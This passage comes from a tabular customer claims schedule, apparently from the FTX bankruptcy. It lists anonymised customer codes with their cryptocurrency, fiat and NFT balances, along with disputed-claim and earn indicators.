| 07371112 | | USD[10.00] | | |
| 07371113 | | USD[9.76] | | |
| 07371114 | | DOGE[135.54913727], USD[0.00] | | |
| 07371115 | | USD[0.00] | | |
| 07371116 | | BAT[2], USD[1013.95] | | |
| 07371117 | | USD[10.00] | | |
| 07371119 | | BCH[0], BTC[0], SOL[18.43092893], USD[0.00], USDT[0.00000006] | | |
| 07371120 | | USD[0.00] | | |
| 07371122 | | CUSDT[1], DOGE[31.05117496], TRX[45.20108073], USD[0.01] | | |
| 07371124 | | BAT[6.62301556], BTC[0.00000050], CUSDT[12], DOGE[69543.15865952], ETH[.00001601], ETHW[.00001601], GRT[1.00341736], LINK[1.16188952], SHIB[65134035.92929695], SUSHI[0], TRX[9.000743], USD[0.00], USDT[0.00000004] | Yes | |
| 07371125 | | BRZ[1], BTC[.01113873], CUSDT[14], DOGE[2144.75266006], ETH[.41685081], ETHW[.41667555], SOL[.14164506], TRX[2], USD[0.00] | Yes | |
| 07371126 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371127 | | BTC[.1902096], ETH[2.997], ETHW[2.997], LINK[147.48], SOL[73.926], SUSHI[.0395], USDT[13268.4475675] | | |
| 07371128 | | USD[0.22] | | |
| 07371130 | | CUSDT[1], DOGE[377.9981672], TRX[3], USD[0.00] | | |
| 07371134 | | LTC[5.34708], NFT (329318330851557962/Wonky Stonk #1833)[1], NFT (370057053644807445/Wonky Stonk #1832)[1], SOL[20.6172], TRX[8632.73259281], USD[0.13], USDT[4.12218252] | | |
| 07371135 | | USD[10.00] | | |
| 07371136 | | BRZ[0], BTC[0], CUSDT[0], DOGE[734.04945233], SHIB[1], TRX[0], USD[0.00], USDT[0], YFI[0] | | |
| 07371137 | | SOL[0], USD[0.01] | Yes | |
| 07371138 | | DOGE[160.62853947], USD[2.00] | | |
| 07371139 | | DOGE[530.8306301], USD[10.00] | | |
| 07371140 | | USD[10.00] | | |
| 07371141 | | BAT[232.7971109], CUSDT[.00253095], DOGE[225.03364417], ETH[.76372807], ETHW[.76340745], GRT[289.56156356], LINK[7.28082683], LTC[1.10656181], MATIC[70.62406854], SOL[15.13648187], TRX[461.5910583], USD[0.00] | Yes | |
| 07371142 | | USD[10.00] | | |
| 07371143 | | CUSDT[4], SOL[.09432581], TRX[2], USD[0.00] | Yes | |
| 07371144 | | BAT[1.01655549], BRZ[2], CUSDT[1], DOGE[1], SUSHI[184.11178126], USD[2504.72] | Yes | |
| 07371145 | | USD[0.00], USDT[0] | | |
| 07371146 | | USD[10.00] | | |
| 07371148 | | USD[10.00] | | |
| 07371149 | | USD[10.00] | | |
| 07371151 | | DOGE[102.14053468], USD[10.00] | | |
| 07371152 | | USD[10.00] | | |
| 07371155 | | USD[0.80] | | |
| 07371156 | | BCH[0], BTC[0], DOGE[1], LTC[0], TRX[1], USD[0.00] | | |
| 07371157 | | CUSDT[5], USD[0.00] | | |
| 07371158 | | USD[10.00] | | |
| 07371159 | | BRZ[1], DOGE[2], NFT (290826077724970557/The 2974 Collection #1682)[1], NFT (319146488603629766/GSW Championship Commemorative Ring)[1], NFT (440315526688566696/Warriors Hoop #16 (Redeemed))[1], SHIB[4], TRX[1], USD[0.00] | | |
| 07371160 | | USD[10.00] | | |
| 07371161 | | BTC[.00235532], CUSDT[3], DOGE[2], TRX[1199.59992718], USD[0.00] | Yes | |
| 07371162 | | BRZ[1], CUSDT[2], DOGE[1047.33451768], USD[5.07], USDT[4.96806468] | | |
| 07371164 | | USD[10.00] | | |
| 07371165 | | USD[10.00] | | |
| 07371167 | | SUSHI[.3309], USD[2.41], USDT[1.70763025] | | |
| 07371168 | | USD[0.01] | | |
| 07371169 | | USD[10.00] | | |
| 07371170 | | CUSDT[2], DOGE[130.01299765], TRX[3], USD[0.03] | | |
| 07371171 | | USD[10.00] | | |
| 07371173 | | BRZ[1], BTC[0], DOGE[1], USD[0.00] | | |
| 07371174 | | BTC[0], ETH[0], NEAR[0], NFT (356323477330368456/Entrance Voucher #25155)[1], SOL[0.00000001], USD[0.00], USDT[0.00001362] | | |
| 07371176 | | CUSDT[4], DOGE[0], GRT[0], SHIB[314126.76605884], SOL[0], USD[0.00] | | |
| 07371178 | | USD[10.00] | | |
| 07371179 | | USD[10.00] | | |
| 07371182 | | BRZ[1], CUSDT[4], DOGE[177.73284059], ETH[.00705039], ETHW[.00705039], MATIC[22.8776578], SUSHI[3.84885664], TRX[277.98937369], USD[0.00] | | |
| 07371183 | | DOGE[2.00025523], USD[0.00] | | |
| 07371184 | | USD[10.00] | | |
| 07371186 | | USD[10.00] | | |
| 07371189 | | USD[0.00] | | |
| 07371190 | | USD[10.00] | | |
| 07371191 | | BAT[45.52712745], BCH[.05711457], BTC[.00214122], DOGE[1443.31860505], ETH[.01312654], ETHW[.01296238], GRT[20.05066318], SHIB[698450.54861537], TRX[916.07315553], USD[0.00] | Yes | |
| 07371195 | | USD[10.00] | | |
| 07371197 | | USD[10.00] | | |
| 07371198 | | SOL[12.36762], USD[4.20] | | |
| 07371199 | | DOGE[1], USD[0.00] | | |
| 07371200 | | USD[10.00] | | |
| 07371201 | | USD[0.00] | | |
| 07371204 | | BTC[0.00000146], USD[0.00] | | |
| 07371205 | | BRZ[1], CUSDT[3], TRX[99.28927045], USD[0.09] | | |
| 07371206 | | USD[10.00] | | |
| 07371207 | | USD[10.00] | | |
| 07371209 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371210 | | USD[10.91] | Yes | |
| 07371211 | | BTC[0], ETH[0.05968145], NFT (427756272867505234/FTX - Off The Grid Miami #2104)[1], USD[78.03], USDT[0.00002688] | | |
| 07371213 | | CUSDT[2], DOGE[994.11675918], SOL[.04886445], TRX[1], USD[1.11] | Yes | |
| 07371214 | | USD[0.00] | | |
| 07371215 | | USD[10.00] | | |
| 07371216 | | BTC[0], USD[39.67] | | |
| 07371218 | | ETH[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07371219 | | USD[10.00] | | |
| 07371220 | | USD[11.07] | Yes | |
| 07371222 | | BTC[0], DOGE[10452.537], ETH[0], ETHW[0], USD[75121.08], USDT[0] | | |
| 07371223 | | USD[10.00] | | |
| 07371224 | | USD[10.00] | | |
| 07371225 | | USD[10.00] | | |
| 07371226 | | ETH[0], SUSHI[0], USD[0.90] | | |
| 07371227 | | USD[10.00] | | |
| 07371228 | Contingent, Disputed | DOGE[121.52579032], USD[0.00] | | |
| 07371229 | | BAT[0], BCH[0], CUSDT[3], DOGE[0], ETH[0.01388421], ETHW[0.01388421], GRT[31.37248570], LINK[1.29585973], LTC[0.04744487], MATIC[11.00532537], UNI[0.34991729], USD[0.00] | | |
| 07371230 | | USD[8.31] | Yes | |
| 07371231 | | DOGE[2884.89963955], SHIB[127.25959805], USD[0.00] | Yes | |
| 07371232 | | USD[10.00] | | |
| 07371233 | | TRX[0], USD[2.11] | Yes | |
| 07371235 | | DOGE[38.61108767], USD[0.00] | | |
| 07371236 | | BTC[0], USD[0.00] | | |
| 07371237 | | DOGE[147.62008376], USD[0.00] | Yes | |
| 07371238 | | TRX[203.51246228], USD[0.00] | | |
| 07371239 | | USD[10.00] | | |
| 07371241 | | USD[10.00] | | |
| 07371242 | | USD[10.00] | | |
| 07371243 | | USD[10.00] | | |
| 07371244 | | BCH[0], BTC[0], USD[0.00] | | |
| 07371245 | | AAVE[0], AVAX[.02], BRZ[1], BTC[0], DOGE[.94163629], ETH[0.00002400], SOL[0], USD[1.06], USDT[0] | | |
| 07371247 | | USD[10.00] | | |
| 07371248 | | USD[10.00] | | |
| 07371249 | | ETHW[.0004683], NFT (405259118074802357/Australia Ticket Stub #2074)[1], SOL[.000835], USD[37.69] | | |
| 07371250 | | EUR[8.15], USD[0.00] | | |
| 07371251 | | USD[10.00] | | |
| 07371252 | | CUSDT[1], DOGE[.00796751], TRX[1], USD[0.00], YFI[.00030173] | | |
| 07371253 | | USD[10.00] | | |
| 07371254 | | DAI[9.90842455], DOGE[2], TRX[698.90931008], USD[25.00] | | |
| 07371255 | | USD[0.28], USDT[0] | Yes | |
| 07371256 | | USD[10.00] | | |
| 07371257 | | USD[10.00] | | |
| 07371258 | | USD[10.00] | | |
| 07371259 | | BRZ[1], DOGE[9777.33944024], USD[0.00] | | |
| 07371260 | | USD[10.00] | | |
| 07371262 | | BRZ[2], CUSDT[1], DOGE[.00004581], GRT[1], TRX[4], USD[0.01], USDT[1] | | |
| 07371263 | | USD[10.00] | | |
| 07371264 | | USD[10.00] | | |
| 07371265 | | BRZ[0], BTC[0], DOGE[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0.00000001] | | |
| 07371266 | | USD[11.06] | Yes | |
| 07371267 | | BRZ[1], BTC[0], DOGE[12], TRX[2], USD[0.00] | | |
| 07371269 | | TRX[931.32298893], USD[0.00] | | |
| 07371271 | | TRX[205.58331387], USD[0.00] | | |
| 07371272 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07371274 | | USD[10.00] | | |
| 07371275 | | CUSDT[1], ETH[.0020838], ETHW[.00205644], NFT (487376091572381588/Entrance Voucher #3023)[1], NFT (547408110369591492/G7 Struck)[1], SOL[2.04428701], TRX[2], USD[0.00] | Yes | |
| 07371276 | | BAT[1.992], DOGE[0], ETH[0], SOL[0], USD[0.63], USDT[0.00000820] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371278 | | BTC[0.00003490], ETH[.00000001], ETHW[0], NFT (290114841770308618/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #1][1], NFT (293023092965957032/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #22][1], NFT (308912133981102602/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #1][1], NFT (327443286034309144/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #1][1], NFT (338522271189029276/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #32][1], NFT (358922398802771650/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #1][1], NFT (388273400019499421/Marcus Allen's Playbook: Kansas City Chiefs vs. Detriot Lions - November 29, 1996 #1][1], NFT (403446467855537107/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #31][1], NFT (410901217788659396/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #29][1], NFT (437494295831088812/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #34][1], NFT (451164103166663426/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #31][1], NFT (464713963652512241/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #35][1], NFT (469548642802061854/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #1][1], NFT (470893786195801682/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #40][1], NFT (472183078285190187/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #1][1], NFT (499451436132589715/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #29][1], NFT (512134807167095373/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #28][1], NFT (543397502681158050/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #20][1], NFT (545108405172536858/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #2][1], NFT (553655621765512453/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #1][1], NFT (555225754739596556/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #1][1], NFT (558400683287909333/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #1][1], NFT (563085301306593517/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #1][1], NFT (563556768841266256/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #1][1], NFT (566603814329072055/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #1][1], SOL[0], USD[0.00], USDT[0.00000041] | | |
| 07371279 | | USD[10.00] | | |
| 07371280 | | USD[10.00] | | |
| 07371282 | | USD[0.00], USDT[1.60581009] | | |
| 07371284 | | DOGE[133.85750146], TRX[1], USD[0.00] | | |
| 07371285 | | USD[10.00] | | |
| 07371286 | | DOGE[49565.74760424], ETH[7.54543573], ETHW[7.54256213], SHIB[22186403.46273895], USD[0.00], USDT[0] | Yes | |
| 07371287 | | BAT[0], CUSDT[2], TRX[3], USD[1.54] | Yes | |
| 07371288 | | DOGE[1], TRX[215.37293223], USD[0.00] | | |
| 07371289 | | BAT[0], BTC[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[2.41] | | |
| 07371290 | | USD[10.00] | | |
| 07371291 | | BRZ[63.9616093], BTC[.00001188], CAD[0.00], CUSDT[17], ETH[.01874831], ETHW[0.01851575], LINK[.0182227], LTC[.69072553], SHIB[3134620.75771653], TRX[2068.15205727], USD[0.00], USDT[0.00046801] | Yes | |
| 07371292 | | CUSDT[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07371293 | | USD[10.00] | | |
| 07371294 | | CUSDT[1], DOGE[.04236996], USD[0.01] | | |
| 07371295 | | BAT[16.74215677], USD[0.00] | | |
| 07371296 | | BTC[.00063325], SUSHI[5.478] | | |
| 07371297 | | SOL[25.0116], USD[0.39] | | |
| 07371298 | | CUSDT[8], TRX[2], USD[0.00] | | |
| 07371300 | | DOGE[309.2115803], TRX[1], USD[3.24] | | |
| 07371303 | | BAT[1.01544078], SOL[73.52948002], TRX[1], USD[0.00] | Yes | |
| 07371305 | | USD[10.00] | | |
| 07371306 | | USD[10.00] | | |
| 07371307 | | USD[10.00] | | |
| 07371308 | | DOGE[4520.33555583], USD[0.37], USDT[1] | | |
| 07371309 | | GRT[5.87647049], USD[0.00] | | |
| 07371310 | | DOGE[8.09884637], USD[0.00] | | |
| 07371313 | | BCH[.13730507], BRZ[3], CUSDT[7], DOGE[136.9639556], GRT[1], SHIB[1164862.27140943], TRX[929.77917278], USD[0.00] | | |
| 07371314 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07371315 | | BRZ[0], BTC[0], CUSDT[0], DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07371316 | | ETH[.00135471], ETHW[.00134103], USD[0.00] | Yes | |
| 07371318 | | USD[10.00] | | |
| 07371319 | | USD[10.00] | | |
| 07371321 | | USD[0.44] | Yes | |
| 07371322 | | USD[10.00] | | |
| 07371324 | | DOGE[123.28925372], USD[0.00] | | |
| 07371325 | | USD[0.00] | | |
| 07371326 | | USD[0.00] | | |
| 07371327 | | USD[386.75] | | |
| 07371328 | | BTC[0], CUSDT[7], DOGE[0.00003098], ETH[0.08281226], ETHW[0.08281226], GRT[0], TRX[2], USD[0.00] | | |
| 07371329 | | USD[10.00] | | |
| 07371330 | | BTC[.00016243], CUSDT[1], USD[0.00] | Yes | |
| 07371331 | | CUSDT[3], DOGE[2], ETH[.0733392], ETHW[.0733392], USD[0.00] | | |
| 07371333 | | CUSDT[1548.84975702], DOGE[2229.55010938], TRX[149.0657797], USD[0.00] | Yes | |
| 07371334 | | BAT[2.0848601], BRZ[5], CUSDT[5], DOGE[4], ETH[.00000475], ETHW[5.88365612], SHIB[1], SUSHI[1.07434236], TRX[5], USD[0.00] | Yes | |
| 07371336 | | USD[10.00] | | |
| 07371338 | Contingent, Disputed | USD[10.00] | | |
| 07371339 | | USD[10.00] | | |
| 07371340 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371341 | | USD[0.00] | | |
| 07371342 | | BAT[.15344169], CUSDT[50.71751089], DOGE[101.03755279], TRX[100.00002444], USD[0.00] | | |
| 07371343 | | DOGE[17.05769004], USD[0.00] | | |
| 07371344 | | USDT[0] | | |
| 07371345 | | USD[10.00] | | |
| 07371346 | | BAT[0], BF_POINT[400], BTC[0.00236272], DOGE[51.48703901], LINK[0.56486226], LTC[0.02577910], PAXG[0], SOL[0.52094631], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07371347 | | USD[10.00] | | |
| 07371348 | | BTC[.00021253], DOGE[6.58178935], GRT[1], USD[0.07], USDT[2] | | |
| 07371349 | | CUSDT[1], DOGE[3.00000044], USD[0.01] | Yes | |
| 07371351 | | USD[10.00] | | |
| 07371352 | | BAT[190.69467331], BRZ[5], BTC[.04285264], CUSDT[10], DOGE[1002.00002251], ETH[1.28542585], ETHW[1.28542585], GRT[41.30302249], LINK[5.43189206], SHIB[3560239.24807747], SOL[2.57423403], TRX[2], USD[0.34] | | |
| 07371353 | | USD[10.00] | | |
| 07371354 | | USD[0.00] | Yes | |
| 07371355 | | USD[10.00] | | |
| 07371356 | | CUSDT[2], DOGE[.00004702], USD[0.01] | | |
| 07371357 | | BRZ[1], CUSDT[2], DOGE[2.01045542], GRT[1.43033085], TRX[6], USD[0.00], USDT[0.00002264] | Yes | |
| 07371358 | | BRZ[1], CUSDT[1], USD[0.00], USDT[0] | | |
| 07371359 | | CUSDT[1], DOGE[1.19292098], USD[0.00] | | |
| 07371360 | | BTC[.00936737], DOGE[849.66973247], TRX[1], USD[10.00] | | |
| 07371363 | | USD[10.00] | | |
| 07371364 | | USD[10.00] | | |
| 07371365 | | USD[10.00] | | |
| 07371366 | | USD[0.10] | | |
| 07371367 | | CUSDT[4], DOGE[1], TRX[2], USD[0.00], USDT[0] | | |
| 07371371 | | USD[10.00] | | |
| 07371373 | | USD[10.00] | | |
| 07371374 | | BTC[.0000556], CUSDT[.056], DOGE[.74], UNI[.05], USD[0.62] | | |
| 07371376 | | USD[10.00] | | |
| 07371377 | | CUSDT[1], USD[0.23] | | |
| 07371378 | | BTC[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00007839] | | |
| 07371379 | | CUSDT[1], DOGE[83.86878773], USD[0.03] | | |
| 07371380 | | USD[10.00] | | |
| 07371381 | | USD[10.00] | | |
| 07371382 | | NFT [384259142826370969/Australia Ticket Stub #1907][1], SOL[0], USD[0.00] | | |
| 07371383 | | DOGE[0], TRX[.00038363], USD[0.27] | | |
| 07371385 | | CUSDT[2.03742698], DOGE[518.83720621], TRX[1], USD[0.00] | | |
| 07371387 | | USD[10.00] | | |
| 07371389 | | CUSDT[1], TRX[0], USD[0.00] | Yes | |
| 07371390 | | USD[1.56] | | |
| 07371391 | | BRZ[2], BTC[.00000033], CUSDT[2], DOGE[1], LINK[21.75839336], SOL[0.00003415], TRX[2], UNI[1.07778042], USD[0.00] | Yes | |
| 07371392 | | CUSDT[5], DOGE[1573.23804349], GRT[1], USD[0.00] | | |
| 07371393 | | BRZ[120.76195869], CUSDT[11], DOGE[585.60425384], TRX[153.53580391], USD[0.00] | Yes | |
| 07371394 | | USD[10.00] | | |
| 07371396 | | BTC[0], DOGE[0], ETH[0], LTC[0], TRX[1], USD[0.00] | | |
| 07371397 | | BTC[0.00010000], USD[0.73] | | |
| 07371398 | | ALGO[313.8027832], AVAX[6.39719863], BAT[2.05114688], BF_POINT[300], BRZ[8.3660147], BTC[0.00856190], CUSDT[22], DOGE[11.01034271], ETH[0], ETHW[1.82387652], GRT[3.16977092], LINK[0.00006453], LTC[0], MATIC[0], SHIB[41], SOL[3.73272629], SUSHI[62.54969406], TRX[20.10545687], UNI[0], USD[0.00], USDT[0.00000018], YFI[0] | | |
| 07371399 | | DOGE[142.12313776], USD[0.00] | | |
| 07371400 | | USD[10.00] | | |
| 07371401 | | CUSDT[1], SHIB[8568449.72132471], USD[1.09], USDT[0] | Yes | |
| 07371402 | | TRX[149.8043714], USD[0.00] | Yes | |
| 07371403 | | BRZ[2], BTC[0], CUSDT[14], DOGE[1539.03377450], LTC[0], SHIB[4847490.88179089], SOL[5.01561517], TRX[2069.60810708], USD[0.00] | | |
| 07371404 | | USD[10.00] | | |
| 07371406 | | BTC[.00000111], CUSDT[3], DOGE[3.00000832], ETH[.00000848], ETHW[.92810511], SOL[0], TRX[2], USD[153.01] | Yes | |
| 07371407 | | SHIB[1.30451879], USD[0.00] | Yes | |
| 07371408 | | USD[10.00] | | |
| 07371409 | | USD[11.08] | Yes | |
| 07371410 | | BRZ[1], USD[0.00] | Yes | |
| 07371411 | | DOGE[1], TRX[115.90260439], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371412 | | USD[0.00] | | |
| 07371413 | | USD[0.00] | | |
| 07371414 | | USD[10.00] | | |
| 07371415 | | BAT[4.36857386], KSHIB[670.37886729], TRX[5], UNI[1.05713974], USD[21415.49], USDT[0] | Yes | |
| 07371416 | | USD[10.00] | | |
| 07371418 | | USD[10.00] | | |
| 07371419 | | USD[0.00] | | |
| 07371420 | | USD[10.00] | | |
| 07371422 | | USD[10.00] | | |
| 07371423 | | CUSDT[1], DOGE[.39494947], TRX[1], USD[0.43] | | |
| 07371425 | | USD[10.00] | | |
| 07371427 | | BTC[0], CUSDT[2], DOGE[1], ETH[0], TRX[1], USD[0.00] | | |
| 07371428 | | ETH[.03412742], ETHW[0.03412741], USD[20.00] | | |
| 07371429 | | USD[10.00] | | |
| 07371430 | | BTC[0.00687880], DOGE[103.257], ETH[0.00000001], ETHW[0], USD[0.00] | | |
| 07371431 | | CUSDT[1], DOGE[33.52628234], ETH[.00150508], ETHW[.00150508], TRX[1], USD[0.00], USDT[4.96707262] | | |
| 07371432 | | USD[0.00] | | |
| 07371434 | | DOGE[148.43454776], SHIB[5460099.61649784], USD[0.00] | | |
| 07371435 | | BRZ[3], DOGE[604.67520524], GRT[2], SHIB[482.70756931], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07371436 | | USD[10.00] | | |
| 07371437 | | BRZ[2], BTC[.06424881], CUSDT[11], DOGE[5], ETH[1.07994171], ETHW[1.07994171], GRT[1], SHIB[1], SOL[.90915065], TRX[5], USD[110.00], USDT[1] | | |
| 07371438 | | USD[10.00] | | |
| 07371439 | | USD[10.00] | | |
| 07371440 | | BRZ[1], DOGE[1.00004449], USD[53.60] | | |
| 07371441 | | USD[10.00] | | |
| 07371442 | | USD[10.00] | | |
| 07371443 | | USD[10.00] | | |
| 07371445 | | DOGE[2117.61402242], ETH[.02941147], ETHW[.02941147], UNI[.48789756], USD[0.00] | | |
| 07371446 | | BCH[.0003306], BTC[.19090189], DOGE[.12131], ETH[4.10345683], ETHW[4.10345683], GRT[.2608], MATIC[1.5868], SOL[60.1185792], SUSHI[.440815], TRX[44426.34088], USD[0.76] | | |
| 07371447 | | LTC[19.92], USD[23.31] | | |
| 07371448 | | BRZ[1], CUSDT[1], DOGE[1.00003043], TRX[.00004192], USD[0.01] | | |
| 07371449 | | ETHW[.50034498], NFT (312583122299366240/Mech #3993)[1], NFT (417606641079145243/Mech #1736)[1], NFT (466744085802854573/Bahrain Ticket Stub #805)[1], SHIB[6], USD[763.83] | Yes | |
| 07371451 | | USD[10.00] | | |
| 07371453 | | DOGE[1], TRX[75.81978835], USD[0.00] | | |
| 07371454 | | TRX[196.12269357], USD[0.00] | | |
| 07371455 | | BAT[0], BCH[0], BTC[0], CUSDT[5], DOGE[1], ETH[0], GRT[0], KSHIB[0.00473151], LTC[0], MATIC[0], SHIB[3.00000827], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07371456 | | USD[10.00] | | |
| 07371457 | | BAT[1.0165555], BTC[0], CUSDT[16], DOGE[0], TRX[237.48297841], USD[0.01] | Yes | |
| 07371458 | | USD[10.00] | | |
| 07371459 | | SOL[2.408], SUSHI[131.97], USD[2.67] | | |
| 07371462 | | SUSHI[.494] | | |
| 07371463 | | USD[0.00], USDT[0.00000001] | | |
| 07371465 | | USD[0.01], USDT[0] | Yes | |
| 07371466 | | USD[10.00] | | |
| 07371467 | | CUSDT[2], USD[0.00] | | |
| 07371468 | | USD[10.00] | | |
| 07371469 | | USD[10.00] | | |
| 07371470 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[0.00] | | |
| 07371471 | | BTC[0.03202041], SOL[17.26519107], USD[0.00], USDT[0.96461576] | | |
| 07371472 | | BRZ[1], CUSDT[2], DOGE[8.08496779], SOL[18.49647006], TRX[1], USD[254.03] | | |
| 07371475 | | DOGE[0], USD[0.00] | | |
| 07371476 | | GRT[4.57620757], USD[0.00] | | |
| 07371478 | | BCH[.01749091], CUSDT[1], USD[0.00] | | |
| 07371479 | | BRZ[1], CUSDT[13], DOGE[71.75362538], GRT[68.90891747], LTC[1.073051], MATIC[123.32397467], MKR[.01678247], SHIB[3379494.24704861], SOL[25.10795853], SUSHI[54.09227392], TRX[4496.75324403], USD[0.00] | | |
| 07371481 | | USD[10.00] | | |
| 07371482 | | USD[10.00] | | |
| 07371484 | | BRZ[1], CUSDT[3], DOGE[85.03426901], USD[0.00] | | |
| 07371485 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371486 | | BRZ[4], CUSDT[14], DOGE[714.51339986], ETH[.64330788], ETHW[.64303199], LINK[8.95243268], SHIB[16928988.00016971], SOL[55.66854741], SUSHI[27.90976408], TRX[2143.25299613], USD[0.00] | Yes | |
| 07371487 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07371488 | | DOGE[.00054299], USD[0.00] | | |
| 07371489 | | DOGE[141.56016859], USD[0.00] | | |
| 07371490 | | DOGE[1001.2191609], USD[0.00] | | |
| 07371491 | | USD[10.00] | | |
| 07371492 | | BTC[0], SUSHI[.092], UNI[.0435] | | |
| 07371493 | | USD[10.00] | | |
| 07371494 | | SOL[1633.8634], USD[10.26] | | |
| 07371497 | | USD[10.00] | | |
| 07371498 | | CUSDT[2], DOGE[2.83388722], TRX[.99217656], USD[0.01] | | |
| 07371499 | | USD[0.01] | | |
| 07371500 | | GRT[1], USD[0.01] | | |
| 07371501 | | USD[10.86] | Yes | |
| 07371502 | | USD[10.00] | | |
| 07371503 | | TRX[1], USD[0.00], YFI[.00445363] | Yes | |
| 07371504 | | USD[10.00] | | |
| 07371505 | | ETH[.00662436], ETHW[.00662436], USD[300.00] | | |
| 07371507 | | ALGO[2.61022667], BAT[0], BTC[0], TRX[0], USD[0.00] | Yes | |
| 07371510 | | BTC[.00027113], CUSDT[5], DOGE[369.54329616], ETH[.00275155], ETHW[.00275155], USD[47.70] | | |
| 07371512 | | USD[10.00] | | |
| 07371513 | | BRZ[3], BTC[.02227592], CUSDT[6], DOGE[1.04752518], ETH[.00000007], ETHW[.00000007], GRT[32.65363136], SHIB[36.52933575], SOL[.18891776], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07371514 | | USD[10.00] | | |
| 07371515 | | USD[10.00] | | |
| 07371517 | | USD[10.00] | | |
| 07371519 | | BTC[.00003476], DOGE[0], USD[0.00] | Yes | |
| 07371520 | | USD[10.00] | | |
| 07371521 | | CUSDT[1], USD[0.00] | Yes | |
| 07371522 | | SUSHI[.22] | | |
| 07371523 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07371524 | | USD[0.06] | | |
| 07371525 | | BRZ[1], CUSDT[12], ETH[0], TRX[9.01851208], USD[0.00] | Yes | |
| 07371526 | | BTC[0.00000002], ETH[.00000001], ETHW[0.00099871], NFT (361214230623884199/Entrance Voucher #1408)[1], NFT (453019591522918576/Bahrain Ticket Stub #1811)[1], NFT (509839497761439011/Humpty Dumpty #1523)[1], SOL[0.01122432], USD[31.39] | | |
| 07371528 | | ETH[.00000001], ETHW[1.24700000], USD[3.27], USDT[0] | | |
| 07371529 | | DOGE[18.924], ETH[0], USD[0.14] | | |
| 07371530 | | DOGE[3], TRX[2], USD[0.01] | | |
| 07371531 | | USD[10.00] | | |
| 07371532 | | BRZ[2], CUSDT[1], TRX[1], USD[0.01], USDT[1.10648314] | Yes | |
| 07371535 | | CAD[12.48], USD[0.00] | | |
| 07371536 | | USD[10.00] | | |
| 07371537 | | CUSDT[4], DOGE[.01437234], TRX[1], USD[0.00] | | |
| 07371538 | | USD[10.00] | | |
| 07371539 | | AUD[0.00], DOGE[0.00000001], ETH[0], NEAR[0], SOL[0], USD[0.00], USDT[0.00000171] | | |
| 07371540 | | CUSDT[2], USD[0.00] | Yes | |
| 07371541 | | USD[10.00] | | |
| 07371544 | | USD[10.00] | | |
| 07371545 | | USD[10.00] | | |
| 07371547 | | BTC[0], ETH[0], TRX[.000008], USD[0.89], USDT[0.00000001] | | |
| 07371548 | | USD[10.00] | | |
| 07371549 | | USD[10.00] | | |
| 07371550 | | BTC[.00048943], CUSDT[1], DOGE[6], ETH[0.00000527], ETHW[0.00000527], LINK[.00000509], SUSHI[.03298478], UNI[.0045082], USD[0.31] | | |
| 07371553 | | USD[10.00] | | |
| 07371554 | | USD[10.00] | | |
| 07371555 | | DOGE[151.82369867], USD[0.00] | | |
| 07371556 | | USD[10.00] | | |
